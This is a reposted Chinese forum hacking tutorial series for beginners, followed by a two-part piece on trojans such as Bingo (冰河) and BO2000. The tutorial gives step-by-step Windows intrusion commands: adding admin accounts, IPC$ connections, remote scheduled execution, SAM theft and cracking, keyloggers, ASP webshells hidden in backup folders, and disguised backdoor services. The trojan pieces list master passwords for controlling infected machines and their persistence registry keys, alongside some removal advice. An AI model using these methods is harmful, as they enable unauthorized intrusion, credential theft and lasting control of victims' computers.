菜鳥學(xué)習(xí)初級(jí)教程-----強(qiáng)烈推薦

<DIV class=tpc_content id=read_495>基礎(chǔ)知識(shí)（6）<BR><BR><BR>net user iusr_machinename cshu （把它的密碼設(shè)為cshu） <BR><BR>net localgroup administrators iusr_machinename /add（加入administrators組） <BR><BR>這樣我們就擁有了iusr_machinename這一賬號(hào)，admin權(quán)限，簡(jiǎn)單吧！ <BR><BR>熟悉一下net use 命令： <BR><BR>net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接 <BR><BR>copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 復(fù)制到機(jī)器c:\winnt\system32上，若是c$.d$,就表示c,d盤 <BR><BR>net time \\11.11.22.22 看到了時(shí)間了，比如是8點(diǎn) <BR><BR>at \\11.11.22.22 8:03 haha.exe 就會(huì)在8點(diǎn)3分執(zhí)行。 <BR><BR>net use \\11.11.22.22 /delete 斷開連接 <BR><BR>應(yīng)該是很簡(jiǎn)單的。這樣我們就可以隨心所欲地操作11.11.22.22了，admin是最高權(quán)限，所以沒有限制的：） <BR><BR>是不是很簡(jiǎn)單？所以我是溢出是很厲害的攻擊方法。 <BR><BR>3389知道吧！如果能進(jìn)入，那么用上面的命令也可以輕易拿到admin的，不過呢，有3389漏洞的機(jī)器已經(jīng)不多了?？茨氵\(yùn)氣了?。ū菊居袔灼P(guān)于3389的好文章） <BR><BR>總的來說，還是unicode的機(jī)器最多，為什么注意文明用語網(wǎng)管不會(huì)滅絕呢：）雖然unicode拿admin有一定難度，但還是要試試的。 <BR><BR>首先，我們檢查一下unicode在這臺(tái)機(jī)器上的權(quán)限，一般看讀寫權(quán)限和運(yùn)行權(quán)限。用copy 或del命令便可確定讀寫權(quán)限，然后上傳文件運(yùn)行一下便可知道運(yùn)行權(quán)限。 <BR><BR>1，如果我們可以對(duì)winnt\repair和winnt\config進(jìn)行訪問，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下載下來，或者把它復(fù)制到inetpub\wwwroot下，改成zip下載。 <BR><BR>拿到sam后，用lc3破解版暴力破解吧，這種方法比較費(fèi)時(shí)。 <BR><BR>2，要是有運(yùn)行權(quán)限，拿就拋個(gè)木馬上去吧！雖說木馬可能也會(huì)沒有權(quán)限，但自啟動(dòng)的模式在admin登陸后可能會(huì)自己提升了權(quán)限。要注意的是，最好放最新的木馬，因?yàn)槟抉R很容易被殺毒軟件查殺！ <BR><BR>3，其實(shí)和2差不多，只不過變成了鍵盤記錄器，選個(gè)國(guó)產(chǎn)的，一般殺毒軟件不會(huì)殺出來，認(rèn)真配置好后傳上去，下線睡覺或是做家務(wù)去！等到網(wǎng)管用了機(jī)器，密碼就會(huì)被紀(jì)錄下來，我們?cè)谌ト?，admin就順利到手了：） <BR><BR>4，getadmin和pipeupadmin，前者是nt4用的，后者是2000?？纯磶椭朗褂梅椒ê螅ㄆ鋵?shí)猜都猜得到）就可以提升一個(gè)用戶的權(quán)限，有一步登天的感覺！ <BR><BR>5，手工做個(gè)bat文件，里面是建立用戶等命令，然后把它放到自啟動(dòng)下，有很多途徑：documents and settings下的開始菜單下的啟動(dòng)，知道了吧，至于要順利放進(jìn)去的話，會(huì)遇到空格長(zhǎng)名等等問題，就看你的基本功了。win.ini里有l(wèi)oad，加進(jìn)去。還有便是注冊(cè)表，好好研究一下regedit. <BR><BR>6，本地溢出。這個(gè)比較高深，我能告訴大家的只是，去四處找找本地溢出程序。 <BR><BR>總的來說，unicode改主頁是非常簡(jiǎn)單的，但是若是要取得更高的權(quán)限，就要一番努力，上面的方法只是些思路，實(shí)際操作時(shí)需要具體處理，開動(dòng)腦筋，把方法都結(jié)合起來。（是不是聽起來有點(diǎn)玄？） <BR><BR>想想好像沒有什么其他的途徑要說了，什么？linux,呵呵，我還不大懂，就不在這里瞎說了。 <BR><BR>那今天就說到這里了，6里面我會(huì)說說后門制作，小問題和我的一點(diǎn)經(jīng)驗(yàn)。期待吧！ <BR><BR><BR><BR>這是最后一節(jié)了，寫的傻傻的，但我畢竟堅(jiān)持下來了，值得鼓勵(lì)?。ㄅ紶柊一下）在寫菜鳥操的同時(shí)，我們的cshu(cshu.51.net)也在默默成長(zhǎng)，但現(xiàn)在我要準(zhǔn)備離開了，真是有點(diǎn)舍不得。在今后的日子里，還請(qǐng)大家多多支持cshu和christ,freedom他們。 <BR><BR>今天說點(diǎn)什么呢？沒有主題，亂談一通吧！ <BR><BR>首先我要吐一次血，當(dāng)然是為了推薦一樣?xùn)|西，就是流光?。敲礇]創(chuàng)意，老土！）不管怎么說，小榕的流光應(yīng)該是中國(guó)第一黑軟，他綜合了諸多的攻擊手段，使攻擊便捷化，當(dāng)然可能讓我們養(yǎng)成了懶惰的習(xí)慣。不會(huì)用流光的最好去學(xué)學(xué)。 <BR><BR>我來說說我自己覺得最有用的幾個(gè)項(xiàng)目： <BR><BR>1，探測(cè)----掃描pop3/ftp/nt/sql主機(jī)，要是無目的地黑，那么用這個(gè)再合適不過了。進(jìn)去后填好ip范圍（范圍可以掃大一點(diǎn)，它很快的），至于類型嘛，要是你要一大堆unicode，那么選擇iis/frontpage再合適不過了，要是要更高的權(quán)限，sql是不錯(cuò)的選擇。完成后，表格里會(huì)多出一大堆東西。 <BR><BR>remote execute-x 這是幾種不同的unicode，用它比用ie來執(zhí)行方便多了，但是echo有問題（是我自己不會(huì)，會(huì)的朋友快教我） <BR><BR>remote ftp pcaw file method-x 這是遠(yuǎn)程獲取pc anywhere的密碼文件，要使用的話，你首先要有一個(gè)ftp賬號(hào)，去申請(qǐng)吧！順利拿到cif文件后，用流光自帶的工具就可以解開密碼，很爽的！ <BR><BR>remote ftp sam -x 拿sam的，還是用最好的lc3來解吧！ <BR><BR>frontpage extended 這是frontpage擴(kuò)展，不過不要高興，是要密碼的。但是若是后面跟了privilege hole的話，放聲大笑吧?。ㄐ⌒牟灰屶従幽弥说稕_進(jìn)來）打開frontpage，打開站點(diǎn)， <A href="http://ip/" target=_blank><FONT color=#2f5fa1>http://ip</FONT></A>就可以了?。╤ttp://不要忘） <BR><BR>此外還有一點(diǎn)變通，大家肯定讀的懂的。 <BR><BR>2，探測(cè)----高級(jí)掃描工具。這可是流光4中的重頭戲，綜合了很多漏洞，還可以用plugin功能加入新的漏洞。這項(xiàng)功能很適合對(duì)某一站點(diǎn)進(jìn)行探測(cè)，很快掃出漏洞后，流光會(huì)生成一個(gè)報(bào)告文件，其中包含漏洞的連接，要是你看不懂的話，建議你拿出x-scan，里面有漏洞描述的。 <BR><BR>3，工具----nt管道遠(yuǎn)程命令，種植者，這兩項(xiàng)功能對(duì)我們攻擊nt來說是相當(dāng)好用的。但前提是要有賬號(hào)，相信在此之前你應(yīng)該有幾個(gè)了吧，那就快點(diǎn)試試吧！ <BR><BR>總的來說，流光的使用是非常簡(jiǎn)單的，其中也有不少工具值得我們一用，tools目錄里有一些很好的工具，exploit里則有很多溢出攻擊程序，前提是你應(yīng)該會(huì)c,不會(huì)的話我也沒辦法，學(xué)會(huì)c起碼要看10倍于菜鳥操的資料吧！另外給大家推薦一個(gè)站點(diǎn)：<A href="http://www.hack.co.za/" target=_blank><FONT color=#2f5fa1>www.hack.co.za</FONT></A>，有什么漏洞的話就去那里找找，你會(huì)有所收獲的。 <BR><BR><BR>然后我想說說一些黑站的經(jīng)驗(yàn)。 <BR><BR>☆當(dāng)我們用unicode控制一臺(tái)機(jī)器時(shí)，我向大家推薦用asp木馬，阿新的改良版，本站有下載的。上傳asp文件前不要忘了修改list.asp中的地址信息，最好也放一個(gè)cmd.asp上去，運(yùn)氣好的話，可以運(yùn)行命令的。 <BR><BR>上傳好后，ie里輸入其中index.asp的地址，呵呵，我們就能方便地管理其中的文件了，可以改網(wǎng)頁，改代碼，上傳腳本文件麻煩？那就用它來生成吧！ <BR><BR>推薦他的最大原因便是----便于隱藏！一般網(wǎng)站總有一個(gè)龐大的目錄，選擇一個(gè)深的，放進(jìn)去，網(wǎng)管很難發(fā)現(xiàn)的：） <BR><BR>最后對(duì)大家說一句，要是有備份目錄（很多網(wǎng)站都有的），最好也放一份進(jìn)去。有一次我用這個(gè)東西修改一家網(wǎng)站的首頁，改了兩三次網(wǎng)管也沒刪掉，可是突然一天不行了，原來他用了備份的網(wǎng)頁（還算機(jī)靈吧） <BR><BR>☆我想對(duì)大家說，對(duì)于國(guó)內(nèi)網(wǎng)站，最好不要惡意去攻擊，因?yàn)槲覀兪侵袊?guó)人嘛！在5/1期間，我發(fā)現(xiàn)有一些國(guó)內(nèi)站點(diǎn)被黑，留下的頁面上不是poison box，而是中國(guó)人的話，這真是無恥到了極點(diǎn)?。。。〈蠹仪f不要學(xué)哦。還有，現(xiàn)在網(wǎng)上有很多還沒有網(wǎng)頁的主機(jī)，往往有很多漏洞，對(duì)于這種機(jī)器，竟有一些小人也會(huì)去改收頁（比如上海那個(gè)姓楊的小子）這算什么？顯示實(shí)力，炫耀技術(shù)？呵呵，見鬼去吧！ <BR><BR>我的建議是，不要改它的首頁，而是努力去拿admin,控制它，這樣我們有很多選擇：肉雞，等它有正式主頁后可以黑，或者把我們的主頁放上去！比申請(qǐng)好多了，權(quán)限又足！當(dāng)然很危險(xiǎn)：）這樣做是不是有品位多了？ <BR><BR>☆要是我們拿到了admin，但有時(shí)卻不能執(zhí)行一些命令，那很可能是因?yàn)榉?wù)啟動(dòng)的問題。試著用以下命令： <BR><BR>net start termservice 啟動(dòng)win2k的終端控制 <BR><BR>net start workstation 打開net use 功能 <BR><BR>net start lanmanserver 打開ipc <BR><BR>net start eventlog 啟動(dòng)日志（你不會(huì)那么傻吧！stop） <BR><BR>net start schedule 打開計(jì)劃(at) <BR><BR>net start server 共享 <BR><BR>還有很多，net命令里去找吧！ <BR><BR>☆打開telnet <BR><BR>1，遠(yuǎn)程去運(yùn)行ntlm.exe，流光里有 <BR><BR>2，net stop telnet <BR><BR>3, net start telnet <BR><BR>☆我推薦幾種后門：winshell（默認(rèn)端口5277）相對(duì)于srv，它好一些。remotenc這個(gè)是榕哥的作品，可以以指定用戶執(zhí)行，還可以自己起服務(wù)的名字，很棒的！ <BR><BR>至于服務(wù)的名字，建議大家去看看win2k的進(jìn)程名，學(xué)著起相類似的名字，要做到使網(wǎng)管看到了也不會(huì)引起警覺，或是有警覺也不敢去刪，呵呵，這樣就最好了！ <BR><BR>☆代理問題。我推薦大家自己去做代理，控制了一臺(tái)機(jī)器后，用snake前輩寫的skserver去做個(gè)sock5。 <BR><BR>具體做法就不詳細(xì)說了，因?yàn)楸容^普通，只要熟悉一下用法就可以了。 <BR><BR>做好了sock5，我們可以上oicq，下棋都用它，sock5代理可是很少見的哦！ <BR><BR>要是實(shí)在拿不到sock5,用http也可以，這里推薦一個(gè)軟件tcp2http，它具有很多功能。在給個(gè)站點(diǎn)：dzc.126.com國(guó)內(nèi)最最好的的代理站點(diǎn)，怕死的朋友千萬不要錯(cuò)過。 <BR><BR>最后說說一些對(duì)于菜鳥同志的建議： <BR><BR>不要把黑當(dāng)作一種顯示自己的行為，要是你想耍威風(fēng)，用url欺騙來騙mm最合適了，還可以弄個(gè)yahoo什么的…… <BR><BR>不要在一項(xiàng)技術(shù)上停留過長(zhǎng)時(shí)間，當(dāng)你熟練掌握后，應(yīng)該迅速學(xué)習(xí)下一個(gè)新技術(shù)。 <BR><BR>不要和被你黑的網(wǎng)管過多接觸，前車之鑒哦。 <BR><BR>對(duì)于一臺(tái)好機(jī)器要做好后門，不要輕易失去它。 <BR><BR>想好好學(xué)黑客的話，就常去各大論壇轉(zhuǎn)轉(zhuǎn)，仔細(xì)讀教程，忘記聊天室和網(wǎng)絡(luò)游戲吧！ <BR><BR>實(shí)踐是最好的教程，再次重申！ <BR><BR>應(yīng)該多學(xué)計(jì)算機(jī)的其他方面的知識(shí)，任何知識(shí)在一定場(chǎng)合都是有用的。 <BR><BR>編程技術(shù)……好像太難了，不過再難也要學(xué)。 <BR><BR>想不出來了……………… <BR><BR>好了，我們的菜鳥操終于結(jié)束了，我這個(gè)大菜鳥也可以退休了，拼搏一年后我會(huì)回來的。第一節(jié)里我曾許諾讓大家學(xué)會(huì)黑站，不知道大家是否成功了，不管這么樣，我們都該不斷的努力學(xué)習(xí)，不是嗎?</DIV>

<DIV class=tpc_content id=read_496>黑客常用兵器之木馬篇（上）<BR><BR><BR>“我知道遠(yuǎn)程控制是種武器，在十八般兵器中名列第七，木馬呢?” <BR>　　“木馬也是種武器，也是遠(yuǎn)程控制?！?<BR>　　“既然是遠(yuǎn)程控制，為什么要叫做木馬？” <BR>　　“因?yàn)檫@個(gè)遠(yuǎn)程控制，無論控制了什么都會(huì)造成離別。如果它鉤住你的E-Mail，你的E-Mail就要和你離別；如果它鉤住你的QQ，你的QQ就要和你離別。” <BR>　　“如果它鉤住我的機(jī)器，我就和整個(gè)網(wǎng)絡(luò)離別了?” <BR>　　“是的?！?<BR>　　“你為什么要用如此殘酷的武器?” <BR>　　“因?yàn)槲也辉副蝗藦?qiáng)迫與我所愛的人離別?！?<BR>　　“我明白你的意思了?！?<BR>　　“你真的明白?” <BR>　　“你用木馬，只不過為了要相聚?！?<BR>　　“是的?！?<BR><BR>　　一 <BR><BR>　　在眾多的黑客武器中特洛伊木馬（Trojan horse）這種攻擊性武器無論是菜鳥級(jí)的黑客愛好，還時(shí)研究網(wǎng)絡(luò)安全的高手，都視為最愛。雖然有的時(shí)候高手將木馬視為卑鄙的手段。但是作為最為有效的攻擊工具，木馬的威力要比其他的黑客工具大得多。 <BR><BR>　　“木馬既然如此有效，為何在Hacker兵器譜中排名靠后？” <BR><BR>　　“因?yàn)槭褂媚抉R往往不是很光明正大。” <BR><BR>　　“哦？為何？” <BR><BR>　　“在使用木馬的人群中菜鳥黑客居多，他們往往接觸網(wǎng)絡(luò)不久，對(duì)黑客技術(shù)很感興趣，很想向眾人和朋友顯示一番，但是去駕馭技術(shù)不高，不能采取別的方法攻擊。于是木馬這種半自動(dòng)的傻瓜式且非常有效的攻擊軟件成為了他們的最愛。而且隨著國(guó)產(chǎn)化的木馬不斷的出現(xiàn)，多數(shù)黑客的入門攻擊幾乎無一例外都是使用木馬。當(dāng)然對(duì)于那些黑客老手來說他們也并不是不使用木馬了，他們通常會(huì)在得到一個(gè)服務(wù)器權(quán)限的時(shí)候植入自己編寫的木馬，以便將來隨時(shí)方便進(jìn)出這臺(tái)服務(wù)器?！?<BR><BR>　　“但如此一來木馬的名聲不就隨之降低了嗎？” <BR><BR>　　“是的，所以現(xiàn)在的黑客高手都恥于用木馬，更恥于黑個(gè)人的計(jì)算機(jī)?！?<BR><BR>　　“不過木馬在很多人的眼中仍然是一等一的絕好兵器。” <BR>在眾多的木馬之中Cult of Dead Cow開發(fā)的Back Orific2000應(yīng)該算是名氣比較大的一個(gè)。這款軟件是在Back Orific2.1的基礎(chǔ)之上開發(fā)的，但是他最大的改動(dòng)就是增加了對(duì)Windows NT服務(wù)器系列的支持。作為微軟的高端產(chǎn)品，BO2000的這個(gè)功能無疑對(duì)Windows NT來說是致命的，就Windows NT本身而言，由于硬盤采取了NTSF的加密，普通的木馬，包括冰河也無法控制，當(dāng)然要想要讓多數(shù)木馬無法對(duì)Windows NT發(fā)揮作用最好將Windows NT轉(zhuǎn)化為NTSF的格式下才會(huì)比較好用一些。 <BR><BR>　　而正因?yàn)槿绱薆O2000才深得黑客高手的喜愛，因?yàn)樗麄兏信d趣的也只有服務(wù)器，也只有Web Server才能夠提起他們的胃口，那是一種來自深層感官的刺激。 <BR><BR>　　通常情況下木馬大致可分為兩個(gè)部分：服務(wù)器端程序和客戶端程序。服務(wù)器端通常就是被控制端，也是我們傳統(tǒng)概念上的木馬了。 <BR><BR>　　二 <BR><BR>　　“你說BO2000好，但是絕大多數(shù)的殺毒招數(shù)都能夠溝將其制服，而且我感覺他在使用上不如我手里的冰河銳利，況且我也不想黑什么服務(wù)器。我認(rèn)為，個(gè)人電腦中隱藏有更大的寶藏，而且個(gè)人電腦脆弱的我能夠利用任何一種方法摧毀它。 <BR><BR>　　“你說的很對(duì)，冰河確實(shí)銳利，而且稱霸中華江湖一年之久，也可謂武林中少見的好兵刃，但是兵器雖然鋒利，但兵器在打造的時(shí)候卻留下來一個(gè)致命的缺點(diǎn)，這也是木馬冰河為何在武林衰敗的原因?！?<BR><BR>　　“這是一個(gè)什么樣的弱點(diǎn)那？竟然如此致命？” <BR><BR>　　“呵呵，說白了也很簡(jiǎn)單，冰河的作者在打造冰河2.X版本時(shí)就給它留下了一個(gè)后門，這個(gè)后門其實(shí)就是一個(gè)萬能密碼，只要擁有此密碼，即便你中的冰河加了密碼保護(hù)，到時(shí)候仍然行同虛設(shè)?！?<BR><BR>　　“什么！真有此事？想我許多朋友還因?yàn)楸雍糜冒阉?dāng)作了一個(gè)免費(fèi)的遠(yuǎn)程控制程序來用，如此這般，他們的機(jī)子豈不暴露無遺？” <BR><BR>　　“呵呵，在黑客中瞞天過海、借花獻(xiàn)佛這些陰險(xiǎn)的招數(shù)都不算什么，多數(shù)木馬軟件的作者為了擴(kuò)大自己的勢(shì)力范圍和爭(zhēng)取主動(dòng)權(quán)都會(huì)留一手，致命的一招。冰河的作者當(dāng)然也不例外，而且由于作者鐘愛許美靜，所以每一個(gè)冰河中都包含許美靜的歌詞。當(dāng)然作者為自己以后行事方便也留了幾個(gè)萬能密碼。” <BR><BR>　　“噢？萬能密碼？” <BR><BR>　　“通常黑客在植入冰河這種木馬的時(shí)候，為了維護(hù)自己的領(lǐng)地通常的要為自己的獵物加一個(gè)密碼，只有輸入正確的密碼你才能夠正常的控制對(duì)方的計(jì)算機(jī)，但是冰河的打造者為了方便自己的使用在冰河中加入了一個(gè)萬能的密碼，就像萬能鑰匙一樣。冰河各版本的通用密碼： <BR><BR>　　2.2版：Can you speak Chinese? <BR>　　2.2版：05181977 <BR>　　3.0版：yzkzero! <BR>　　4.0版：05181977 <BR>　　3.0版：yzkzero.51.net <BR>　　3.0版：yzkzero! <BR>　　3.1-netbug版密碼: 123456!@ <BR>　　2.2殺手專版：05181977 <BR>　　2.2殺手專版：dzq20000! <BR><BR>你可以試試看，是不是很輕松的就能夠進(jìn)入任何一臺(tái)有冰河服務(wù)器端的電腦？” <BR><BR>　　“真的進(jìn)入了，果然有此事情，怪不得現(xiàn)在很多人都不再使用冰河。” <BR><BR>　　“此外冰河還存在著兩個(gè)嚴(yán)重的漏洞： <BR><BR>　　漏洞一：不需要密碼遠(yuǎn)程運(yùn)行本地文件漏洞。 <BR><BR>　　具體的操作方法如下：我們選擇使用相應(yīng)的冰河客戶端，2.2版以上服務(wù)端用2.2版客戶端，1.2版服務(wù)端需要使用1.2版客戶端控制。打開客戶端程序G_Client，進(jìn)入文件管理器，展開“我的電腦”選中任一個(gè)本地文件按右鍵彈出選擇菜單，選擇“遠(yuǎn)程打開”這時(shí)會(huì)報(bào)告口令錯(cuò)誤，但是文件一樣能上傳并運(yùn)行。 <BR><BR>　　任何人都可以利用這個(gè)漏洞上傳一個(gè)冰河服務(wù)端就可以輕松獲得機(jī)器的生死權(quán)限了，如果你高興的話，還可以上傳病毒和其它的木馬。 <BR><BR>　　漏洞二：不需要密碼就能用發(fā)送信息命令發(fā)送信息，不是用冰河信使，而是用控制類命令的發(fā)發(fā)送信息命令?！?<BR><BR>　　“當(dāng)然這的確是一個(gè)原因，但更主要的是現(xiàn)在的多數(shù)殺毒軟件都能克制冰河?！?<BR><BR>　　三 <BR><BR>　　木馬通常會(huì)在三個(gè)地方做手腳：注冊(cè)表、win.ini、system.ini。這三個(gè)文件都是電腦啟動(dòng)的時(shí)候需要加載到系統(tǒng)的重要文件，絕大部分木馬使用這三種方式進(jìn)行隨機(jī)啟動(dòng)。當(dāng)然也有利用捆綁軟件方式啟動(dòng)的木馬，木馬phAse 1.0版本和NetBus 1.53版本就可以以捆綁方式裝到目標(biāo)電腦上，可以捆綁到啟動(dòng)程序上，也可以捆綁到一般程序的常用程序上。如果木馬捆綁到一般的程序上，啟動(dòng)是不確定的，這要看目標(biāo)電腦主人了，如果他不運(yùn)行，木馬就不會(huì)進(jìn)入內(nèi)存。捆綁方式是一種手動(dòng)的安裝方式，一般捆綁的是非自動(dòng)方式啟動(dòng)的木馬。非捆綁方式的木馬因?yàn)闀?huì)在注冊(cè)表等位置留下痕跡，所以，很容易被發(fā)現(xiàn)，而捆綁木馬可以由黑客自己確定捆綁方式、捆綁位置、捆綁程序等，位置的多變使木馬有很強(qiáng)的隱蔽性。 <BR><BR>　　“在眾多木馬中，大多數(shù)都會(huì)將自己隱藏在Windows系統(tǒng)下面，通常為C:\Windows\目錄或者C:\Windows\system\與C:\Windows\system32下隱藏。” <BR><BR>　　“眾多的目錄中為何選擇這兩個(gè)目錄？” <BR><BR>　　“呵呵，當(dāng)然是為了便于隱蔽。通常這幾個(gè)目錄為計(jì)算機(jī)的系統(tǒng)目錄，其中的文件數(shù)量多而繁雜，很不容易辨別哪些是良性程序哪些是惡性程序，即便高手往往也會(huì)有失誤刪除的情況。而且，即便放置在系統(tǒng)目錄下，就多數(shù)為重要的文件，這些文件的誤刪除往往會(huì)直接導(dǎo)致系統(tǒng)嚴(yán)重的癱瘓?！?<BR><BR>　　“原來如此。” <BR><BR>　　“前輩，木馬冰河是否也做了這些手腳？” <BR><BR>　　“這是自然，木馬一旦被植入目標(biāo)計(jì)算機(jī)中要做的最重要的事就是如何在每次用戶啟動(dòng)時(shí)自動(dòng)裝載服務(wù)端。冰河也是如此了。首先，冰河會(huì)在你的注冊(cè)表中的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和RUNSERVICE 鍵值中加上了\kernl32.exe(是系統(tǒng)目錄)， <BR><BR>　　§c:\改動(dòng)前的RUN下 <BR>　　默認(rèn)="" <BR>　　§c:\改動(dòng)后的RUN下 <BR>　　默認(rèn)="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" <BR>　　§c:\改動(dòng)前RunServices下 <BR>　　默認(rèn)="" <BR>　　§c:\改動(dòng)后RunServices下 <BR>　　默認(rèn)="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" <BR>　　§c:\改動(dòng)前[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： <BR>　　默認(rèn)="Notepad.exe %1" <BR>　　§c:\改動(dòng)后[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： <BR>　　默認(rèn)="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1" <BR><BR>可以看出之所以冰河可以自我恢復(fù)主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe，而且冰河服務(wù)器端的編制是加密的，沒法簡(jiǎn)單的通過改注冊(cè)表得到或換掉。另外值得一提的是，即便你刪除了這個(gè)鍵值，也并非平安大吉，冰河還會(huì)隨時(shí)出來給你搗亂，主要因?yàn)楸拥姆?wù)端也會(huì)在c:\windows目錄下生成一個(gè)叫 sysexplr.exe文件，當(dāng)然這個(gè)目錄會(huì)隨你windows的安裝目錄變化而變化。 <BR>　 <BR>　　“這個(gè)文件名好像超級(jí)解霸啊，冰河竟然如此狠毒?！?<BR><BR>　　“哈哈哈哈，你說的很對(duì)，也很聰明，這個(gè)文件的確很像超級(jí)解霸，但是這還是不夠稱得上為陰險(xiǎn)，最為陰險(xiǎn)的是這個(gè)文件是與文本文件相關(guān)聯(lián)的，只要你打開文本，sysexplr.exe程序就會(huì)重新生成一個(gè)krnel32.exe，此時(shí)你的電腦還是被冰河控制著。而且如果你失誤將sysexplr.exe程序破壞，你計(jì)算機(jī)的文本文件將無法打開?！?<BR><BR>　　木馬都會(huì)很注意自己的端口，多達(dá)六萬多中的端口很容易讓我們迷失其中，如果你留意的話就會(huì)發(fā)現(xiàn)，通常情況下木馬端口一般都在1000以上，并朝著越來越大的趨勢(shì)發(fā)展。這主要是因?yàn)?000以下的端口是常用端口，況且用時(shí)占用這些端口可能會(huì)造成系統(tǒng)不正常，木馬也就會(huì)很容易暴露；此外使用大的端口也會(huì)讓你比較難發(fā)現(xiàn)隱藏其中的木馬，如果使用遠(yuǎn)程掃描端口的方式查找木馬，端口數(shù)越大，需要掃描的時(shí)間也就越多，故而使用諸如8765的端口會(huì)讓你很難發(fā)現(xiàn)隱藏在其中的木馬。 <BR><BR>　　四 <BR><BR>　　“既然木馬如此的陰險(xiǎn)，那么前輩有何可知木馬的方法??？” <BR><BR>　　“現(xiàn)在的木馬雖然陰險(xiǎn)，但終究逃不過幾個(gè)道理。平時(shí)出名的木馬，殺毒軟件就多數(shù)能夠?qū)Ω丁５乾F(xiàn)在木馬種類繁多，有很多殺毒軟件對(duì)付不了的。但是，只要我們謹(jǐn)記一下幾個(gè)方法，就能夠手到擒來?！?<BR><BR>　　“首先，我們可以選擇端口掃描來進(jìn)行判斷，因?yàn)槟抉R在被植入計(jì)算機(jī)后會(huì)打開計(jì)算機(jī)的端口，我們可以根據(jù)端口列表對(duì)計(jì)算機(jī)的端口進(jìn)行分析。此外，查看連接也是一種好辦法，而且在本地機(jī)上通過netstat -a（或某個(gè)第三方的程序）查看所有的TCP/UDP連接，查看連接要比端口掃描快，而且可以直觀地發(fā)現(xiàn)與我們計(jì)算機(jī)連接的有哪些IP地址。當(dāng)然，如果你對(duì)系統(tǒng)很熟悉的話，也可以通過檢查注冊(cè)表來進(jìn)行木馬的殺除，但是這個(gè)方法不適合于那些菜鳥級(jí)用戶。查找木馬特征文件也是一種好方法，就拿冰河來說……” <BR><BR>　　“這個(gè)我知道前輩，木馬冰河的特征文件一定是G_Server.exe?！?<BR><BR>　　“那有這么簡(jiǎn)單。冰河植入計(jì)算機(jī)后真正的特征文件是kernl32.exe和sysexlpr.exe?！?<BR><BR>　　“太狠毒了，一個(gè)跟系統(tǒng)內(nèi)核文件一樣，一個(gè)又像超級(jí)解霸。那么前輩我們把這兩個(gè)文件刪除掉，這冰河豈不就消失了?！?<BR><BR>　　“的確，你要是在DOS模式下刪除了他們，冰河就被破壞掉了，但是你的計(jì)算機(jī)隨之會(huì)無法打開文本文件，因?yàn)槟銊h除的sysexplr.exe文件是和文本文件關(guān)聯(lián)的，你還必須把文本文件跟notepad關(guān)聯(lián)上。修改注冊(cè)表太危險(xiǎn)，你可以在Windows資源管理器中選擇查看菜單的文件夾選項(xiàng)，再選擇文件類型進(jìn)行編輯。不過最簡(jiǎn)單的方法是按住鍵盤上的SHIFT鍵的同時(shí)鼠標(biāo)右擊任何一個(gè)TXT為后綴的文本文件，再選擇打開方式，選中〖始終用該程序打開〗，然后找到notepad一項(xiàng)，選擇打開就可以了?！?<BR><BR>　　“哈哈，按照前輩這么說來，我們只要抓住了這特征，天下的木馬也奈何不了我們了?！?lt;/DIV>

<DIV class=tpc_content id=read_497>黑客常用兵器之木馬篇（下）<BR><BR><BR>　五 <BR><BR>　　“哈哈，你可知道除了冰河這樣的木馬經(jīng)常使用的隱身技術(shù)外，更新、更隱蔽的方法已經(jīng)出現(xiàn)，這就是―驅(qū)動(dòng)程序及動(dòng)態(tài)鏈接庫(kù)技術(shù)。驅(qū)動(dòng)程序及動(dòng)態(tài)鏈接庫(kù)技術(shù)和一般的木馬不同，它基本上擺脫了原有的木馬模式―監(jiān)聽端口，而采用替代系統(tǒng)功能的方法改寫驅(qū)動(dòng)程序或動(dòng)態(tài)鏈接庫(kù)。這樣做的結(jié)果是：系統(tǒng)中沒有增加新的文件所以不能用掃描的方法查殺、不需要打開新的端口所以不能用端口監(jiān)視的方法進(jìn)行查殺、沒有新的進(jìn)程所以使用進(jìn)程查看的方法發(fā)現(xiàn)不了它，也不能用kill進(jìn)程的方法終止它的運(yùn)行。在正常運(yùn)行時(shí)木馬幾乎沒有任何的癥狀，而一旦木馬的控制端向被控端發(fā)出特定的信息后，隱藏的程序就立即開始運(yùn)作。此類木馬通過改寫vxd文件建立隱藏共享的木馬，甚是隱蔽，我們上面的那些方法根本不會(huì)對(duì)這類木馬起作用。 <BR><BR>　　“可是前輩說的這種木馬晚生并沒有見到啊?！?<BR><BR>笨蛋！你沒有見過，你怎么知道我老人家也沒有見過？告訴你我已經(jīng)看到了一個(gè)更加巧妙的木馬，它就是Share。運(yùn)行Share木馬之前，我先把注冊(cè)表以及所有硬盤上的文件數(shù)量、結(jié)構(gòu)用一個(gè)監(jiān)控軟件DiskState記錄了起來，這個(gè)監(jiān)控軟件使用128bit MD5的技術(shù)來捕獲所有文件的狀態(tài)，系統(tǒng)中的任何文件的變動(dòng)都逃不過他的監(jiān)視，這個(gè)軟件均會(huì)將它們一一指出?！?<BR><BR>　　“前輩我這里第一次運(yùn)行Share后，系統(tǒng)好像沒有動(dòng)靜，使用Dllshow（內(nèi)存進(jìn)程察看軟件）觀看內(nèi)存進(jìn)程，似乎也沒有太大的變化。一般木馬都會(huì)馬上在內(nèi)存駐留的，或許此木馬修改了硬盤上的文件?！?<BR><BR>　　“好，那么你就接著用DiskState比較運(yùn)行share.exe前后的記錄。” <BR><BR>　　“程序顯示windows\applog里面的目錄的一些文件和system.dat、user.dat文件起了變化，并沒有其他文件的增加和修改?！?<BR><BR>　　“系統(tǒng)中的applog目錄里面存放了所有應(yīng)用程序函數(shù)和程序調(diào)用的情況，而system.dat和user.dat則是組冊(cè)表的組成文件。你把a(bǔ)pplog目錄里面的share.lgc打開來觀看，它的調(diào)用過程是什么？” <BR><BR>　　“調(diào)用過程如下： <BR><BR>　　c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL" <BR>　　c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL" <BR>　　c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL" <BR>　　c15d4fd0 2623 "C:\WINDOWS\WIN.INI" 